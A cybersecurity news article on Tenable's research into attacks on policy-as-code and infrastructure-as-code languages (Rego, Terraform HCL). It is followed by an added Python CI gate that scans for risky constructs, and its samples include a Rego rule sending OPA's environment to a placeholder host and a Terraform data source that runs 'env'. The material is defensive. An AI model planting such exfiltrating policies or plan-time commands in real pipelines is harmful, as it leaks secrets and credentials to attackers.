SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers

Tenable discovers vulnerabilities in IaC & PaC platforms

Thu, 21st Nov 2024

Tenable's Cloud Security Research team has identified new attack techniques against the domain-specific languages (DSLs) used by widely deployed policy-as-code (PaC) and infrastructure-as-code (IaC) platforms, techniques that can lead to security breaches and data exfiltration.

The research highlights weaknesses in systems that rely on DSLs, which are often perceived as secure because their capabilities are limited compared with general-purpose programming languages. That assumption of security by default is not justified: a DSL that can make network calls or run external programs during evaluation gives an attacker everything needed to leak data, and relying on the language's restrictions alone leaves the system open to exploitation.

The discovery follows an SMB force-authentication vulnerability previously found in Open Policy Agent (OPA). Together, these findings underscore the need to re-evaluate the security measures around PaC and IaC deployments.

In the context of OPA, the Tenable team showed how attackers could compromise the policy supply chain by inserting a malicious Rego policy that is executed during policy evaluation, enabling actions such as credential exfiltration or data leaks. OPA, a widely used policy engine, is deployed across diverse applications, including microservice authorisation and infrastructure policy checks, with policies written in the Rego DSL.

The research also examined Terraform, a prominent IaC tool known for its platform-agnostic, declarative approach. Terraform configurations are written in HashiCorp Configuration Language (HCL), another DSL. Tenable found that when a CI/CD pipeline runs Terraform on a pull-request trigger, code from the pull request can execute before anyone has reviewed it, because the plan stage itself evaluates data sources and loads providers. This exposes the pipeline to insider threats and to external contributors who can open pull requests.

In response to these findings, Tenable Research has laid out a set of mitigations. The first is granular role-based access control (RBAC) that follows the principle of least privilege: separate user roles and lock down the cloud roles the tooling assumes. RBAC should apply both to local users operating the IaC or PaC framework and to anything that reaches it through its APIs.

Another key recommendation is to use third-party components only from credible sources. This applies to Terraform modules and providers as well as OPA policies, and it means verifying the integrity of each component before execution, for example by pinning versions and checking signatures or checksums, so that unauthorised modifications are caught before they run.

Tenable also advises enabling application-level and cloud-level logging for ongoing monitoring and analysis, and limiting the network and data access available to these applications and the infrastructure they run on, so that a compromised policy or configuration has less to reach.

Finally, the advice extends to ensuring that unverified code is never executed automatically within CI/CD pipelines. This step, which Tenable calls "Scan before you plan", places security scanners ahead of the terraform plan stage so that potentially harmful code is stopped before it can run, let alone be deployed.
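The following is an added example, not code from Tenable or from the OPA or Terraform projects, of what a "scan before you plan" gate can look like. It goes slightly beyond the article by covering both sides it discusses in one script: it scans Terraform sources for constructs that run programs at plan time (the external data source and exec provisioners, which are documented Terraform features), scans Rego sources for the http.send and opa.runtime() built-ins (documented OPA built-ins that can move data out of an evaluation), refuses third-party modules that are not pinned to a reviewable version, and checks a downloaded module archive or policy bundle against a pinned SHA-256 before it is loaded. The pattern lists, the pinning rules, the example.invalid hostnames and the sample inputs are all constructed for illustration and are not taken from the research.

```python
"""Pre-plan gate for IaC/PaC sources.

Added example (not Tenable's or any project's code). Run it in CI before
`terraform plan` or before a policy bundle is loaded; a non-empty report means
the pipeline should stop. Pattern lists, pin rules and samples are constructed.
"""
from __future__ import annotations

import hashlib
import hmac
import re

# (file kind, pattern, reason). These are documented Terraform/OPA features;
# they are flagged because they execute during plan/evaluation, i.e. before a
# reviewer has approved the change. `[ \t]*` rather than `\s*` keeps a match
# from swallowing the preceding blank line and misreporting the line number.
RISKY_PATTERNS = [
    ("tf", re.compile(r'^[ \t]*data[ \t]+"external"[ \t]+"', re.M),
     "external data source runs a program during terraform plan"),
    ("tf", re.compile(r'^[ \t]*provisioner[ \t]+"(?:local|remote)-exec"', re.M),
     "exec provisioner runs shell commands"),
    ("rego", re.compile(r"\bhttp\.send\s*\("),
     "http.send can send data to an arbitrary host during evaluation"),
    ("rego", re.compile(r"\bopa\.runtime\s*\(\s*\)"),
     "opa.runtime() exposes environment variables and OPA config"),
]

MODULE_BLOCK = re.compile(r'^module[ \t]+"[^"]+"[ \t]*\{(.*?)^\}', re.M | re.S)
SOURCE_ATTR = re.compile(r'^[ \t]*source[ \t]*=[ \t]*"([^"]+)"', re.M)
VERSION_ATTR = re.compile(r'^[ \t]*version[ \t]*=[ \t]*"[^"]+"', re.M)
GIT_COMMIT_REF = re.compile(r"\?ref=[0-9a-f]{40}$")  # full commit SHA, not a branch or tag


def scan_source(kind: str, text: str) -> list[tuple[int, str]]:
    """Return (line number, reason) for every risky construct in one file."""
    findings = []
    for pkind, pattern, reason in RISKY_PATTERNS:
        if pkind != kind:
            continue
        for match in pattern.finditer(text):
            findings.append((text.count("\n", 0, match.start()) + 1, reason))
    return sorted(findings)


def unpinned_modules(tf_text: str) -> list[str]:
    """Module sources that are not a fixed, reviewable artifact.

    Local paths are accepted (they are part of the same change). Git sources
    must pin a full commit SHA; registry sources must carry a version.
    """
    bad = []
    for block in MODULE_BLOCK.finditer(tf_text):
        body = block.group(1)
        src = SOURCE_ATTR.search(body)
        if src is None:
            continue
        source = src.group(1)
        if source.startswith(("./", "../")):
            continue
        if source.startswith("git::"):
            if not GIT_COMMIT_REF.search(source):
                bad.append(source)
        elif not VERSION_ATTR.search(body):
            bad.append(source)
    return bad


def verify_artifact(data: bytes, pinned_sha256: str) -> bool:
    """Compare a fetched module archive or OPA bundle with its pinned digest."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), pinned_sha256)


def gate(files: dict[str, str],
         artifacts: dict[str, tuple[bytes, str]] | None = None) -> tuple[bool, list[str]]:
    """Run every check; return (passed, report lines)."""
    report: list[str] = []
    for path, text in files.items():
        kind = "tf" if path.endswith(".tf") else "rego" if path.endswith(".rego") else None
        if kind is None:
            continue
        for line, reason in scan_source(kind, text):
            report.append(f"{path}:{line}: {reason}")
        if kind == "tf":
            for source in unpinned_modules(text):
                report.append(f"{path}: module source not pinned: {source}")
    for name, (data, digest) in (artifacts or {}).items():
        if not verify_artifact(data, digest):
            report.append(f"{name}: SHA-256 does not match pinned digest")
    return (not report, report)


# Constructed samples: an unpinned module plus a plan-time program in Terraform,
# and a Rego policy that phones home with OPA's environment during evaluation.
SAMPLE_TF = '''\
module "vpc" {
  source = "git::https://example.invalid/infra/vpc.git?ref=main"
}

module "kms" {
  source  = "terraform-aws-modules/kms/aws"
  version = "2.1.0"
}

data "external" "env_dump" {
  program = ["sh", "-c", "env"]
}
'''

SAMPLE_REGO = '''\
package authz

default allow = false

allow {
    input.user == "admin"
}

leak := http.send({"method": "POST", "url": "https://example.invalid/c", "body": opa.runtime().env})
'''

# SHA-256 of the bytes b"abc", standing in for a pinned bundle digest.
PINNED_BUNDLE_SHA256 = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"

if __name__ == "__main__":
    ok, report = gate({"main.tf": SAMPLE_TF, "authz.rego": SAMPLE_REGO},
                      {"bundle.tar.gz": (b"abd", PINNED_BUNDLE_SHA256)})
    print("PASS" if ok else "FAIL")
    for entry in report:
        print(" ", entry)
```

Against the constructed samples the gate fails with four findings (the external data source, the branch-pinned module, and the two Rego built-ins) plus the digest mismatch. In a real pipeline the gate runs on the pull-request trigger before any terraform plan or opa eval step, and the pinned digests live in the trusted repository rather than in the pull request, so a contributor cannot change a pin and the artifact in the same unreviewed change.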

These insights and recommendations are available for further exploration and understanding on Tenable's blog, providing a detailed analysis of the attack techniques and corresponding mitigation strategies.
